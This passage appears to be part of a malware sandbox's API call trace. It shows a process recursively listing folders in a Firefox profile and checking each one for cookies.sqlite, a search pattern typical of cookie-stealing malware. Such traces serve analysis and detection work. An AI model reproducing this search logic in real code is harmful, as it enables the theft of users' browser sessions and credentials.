pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\*" [0249.527] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\*", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0x4404af0 [0249.528] FindNextFileW (in: hFindFile=0x4404af0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0249.528] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.528] FindNextFileW (in: hFindFile=0x4404af0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0249.528] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.528] lstrlenW (lpString="events") returned 6 [0249.528] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes", pszFile="events" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events" [0249.528] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0249.528] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events", lpDst=0x79b1e20, nSize=0x5f | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events") returned 0x5f [0249.528] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events") returned 94 [0249.528] lstrlenW (lpString="cookies.sqlite") returned 14 [0249.528] PathCombineW (in: pszDest=0x79b1ef0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\cookies.sqlite" [0249.528] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\cookies.sqlite", lpFindFileData=0x79b1bc0 | out: lpFindFileData=0x79b1bc0) returned 0xffffffffffffffff [0249.528] PathCombineW (in: pszDest=0x79b1ef0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\*" [0249.528] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\*", lpFindFileData=0x79b1bc0 | out: lpFindFileData=0x79b1bc0) returned 0x44049d0 [0249.528] FindNextFileW (in: hFindFile=0x44049d0, lpFindFileData=0x79b1bc0 | out: lpFindFileData=0x79b1bc0) returned 1 [0249.528] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.528] FindNextFileW (in: hFindFile=0x44049d0, lpFindFileData=0x79b1bc0 | out: lpFindFileData=0x79b1bc0) returned 0 [0249.529] FindClose (in: hFindFile=0x44049d0 | out: hFindFile=0x44049d0) returned 1 [0249.529] FindNextFileW (in: hFindFile=0x4404af0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0249.529] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.529] FindNextFileW (in: hFindFile=0x4404af0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0 [0249.529] FindClose (in: hFindFile=0x4404af0 | out: hFindFile=0x4404af0) returned 1 [0249.529] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0249.529] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.529] lstrlenW (lpString="datareporting") returned 13 [0249.529] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="datareporting" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting" [0249.529] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0249.529] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting", lpDst=0x7aaf3a0, nSize=0x5e | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting") returned 0x5e [0249.529] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting") returned 93 [0249.529] lstrlenW (lpString="cookies.sqlite") returned 14 [0249.529] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\cookies.sqlite" [0249.529] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\cookies.sqlite", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0xffffffffffffffff [0249.537] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\*" [0249.537] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\*", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0x44049d0 [0249.538] FindNextFileW (in: hFindFile=0x44049d0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0249.538] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.538] FindNextFileW (in: hFindFile=0x44049d0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0249.538] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.538] lstrlenW (lpString="archived") returned 8 [0249.538] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting", pszFile="archived" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived" [0249.538] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x67 [0249.538] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived", lpDst=0x79c5700, nSize=0x67 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived") returned 0x67 [0249.538] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived") returned 102 [0249.538] lstrlenW (lpString="cookies.sqlite") returned 14 [0249.538] PathCombineW (in: pszDest=0x79c57e0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\cookies.sqlite" [0249.538] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\cookies.sqlite", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0xffffffffffffffff [0249.539] PathCombineW (in: pszDest=0x79c57e0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\*" [0249.539] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\*", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0x4404fd0 [0249.539] FindNextFileW (in: hFindFile=0x4404fd0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0249.539] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.539] FindNextFileW (in: hFindFile=0x4404fd0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0249.540] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.540] lstrlenW (lpString="2017-05") returned 7 [0249.540] PathCombineW (in: pszDest=0x79c57e0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived", pszFile="2017-05" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05" [0249.540] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x6f [0249.540] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05", lpDst=0x79c5c50, nSize=0x6f | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05") returned 0x6f [0249.540] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05") returned 110 [0249.540] lstrlenW (lpString="cookies.sqlite") returned 14 [0249.540] PathCombineW (in: pszDest=0x79c5d40, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\cookies.sqlite" [0249.540] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\cookies.sqlite", lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 0xffffffffffffffff [0250.922] PathCombineW (in: pszDest=0x79c5d40, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\*" [0250.922] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\*", lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 0x5d76790 [0250.923] FindNextFileW (in: hFindFile=0x5d76790, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 1 [0250.923] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.923] FindNextFileW (in: hFindFile=0x5d76790, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 1 [0250.923] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.923] FindNextFileW (in: hFindFile=0x5d76790, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 1 [0250.923] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.923] FindNextFileW (in: hFindFile=0x5d76790, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 1 [0250.923] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.923] FindNextFileW (in: hFindFile=0x5d76790, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 1 [0250.923] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.923] FindNextFileW (in: hFindFile=0x5d76790, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 1 [0250.923] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.923] FindNextFileW (in: hFindFile=0x5d76790, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 1 [0250.923] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.923] FindNextFileW (in: hFindFile=0x5d76790, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 1 [0250.923] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.923] FindNextFileW (in: hFindFile=0x5d76790, lpFindFileData=0x79c59f0 | out: lpFindFileData=0x79c59f0) returned 0 [0250.923] FindClose (in: hFindFile=0x5d76790 | out: hFindFile=0x5d76790) returned 1 [0250.924] FindNextFileW (in: hFindFile=0x4404fd0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0 [0250.924] FindClose (in: hFindFile=0x4404fd0 | out: hFindFile=0x4404fd0) returned 1 [0250.924] FindNextFileW (in: hFindFile=0x44049d0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0250.924] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.924] FindNextFileW (in: hFindFile=0x44049d0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0250.924] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.924] FindNextFileW (in: hFindFile=0x44049d0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0 [0250.924] FindClose (in: hFindFile=0x44049d0 | out: hFindFile=0x44049d0) returned 1 [0250.924] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0250.924] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.924] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0250.924] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.924] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0250.924] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.925] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0250.925] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.925] lstrlenW (lpString="gmp") returned 3 [0250.925] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="gmp" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp" [0250.925] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x54 [0250.925] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp", lpDst=0x7aaf3a0, nSize=0x54 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp") returned 0x54 [0250.925] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp") returned 83 [0250.925] lstrlenW (lpString="cookies.sqlite") returned 14 [0250.925] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\cookies.sqlite" [0250.925] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\cookies.sqlite", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0xffffffffffffffff [0250.928] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\*" [0250.928] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\*", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0x5d76790 [0250.928] FindNextFileW (in: hFindFile=0x5d76790, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0250.928] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.929] FindNextFileW (in: hFindFile=0x5d76790, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0250.929] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.929] lstrlenW (lpString="WINNT_x86-msvc") returned 14 [0250.929] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp", pszFile="WINNT_x86-msvc" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc" [0250.929] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x63 [0250.929] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc", lpDst=0x79c5700, nSize=0x63 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc") returned 0x63 [0250.929] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc") returned 98 [0250.929] lstrlenW (lpString="cookies.sqlite") returned 14 [0250.929] PathCombineW (in: pszDest=0x79c57d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\cookies.sqlite" [0250.929] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\cookies.sqlite", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0xffffffffffffffff [0250.932] PathCombineW (in: pszDest=0x79c57d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\*" [0250.932] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\*", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0x5c0fbb0 [0250.932] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0250.932] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.932] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0 [0250.932] FindClose (in: hFindFile=0x5c0fbb0 | out: hFindFile=0x5c0fbb0) returned 1 [0250.933] FindNextFileW (in: hFindFile=0x5d76790, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0 [0250.933] FindClose (in: hFindFile=0x5d76790 | out: hFindFile=0x5d76790) returned 1 [0250.933] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0250.933] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.933] lstrlenW (lpString="gmp-gmpopenh264") returned 15 [0250.933] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="gmp-gmpopenh264" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264" [0250.933] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0250.933] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264", lpDst=0x7aaf3a0, nSize=0x60 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264") returned 0x60 [0250.933] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264") returned 95 [0250.933] lstrlenW (lpString="cookies.sqlite") returned 14 [0250.933] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264", pszFile="cookies.sqlite" | out: 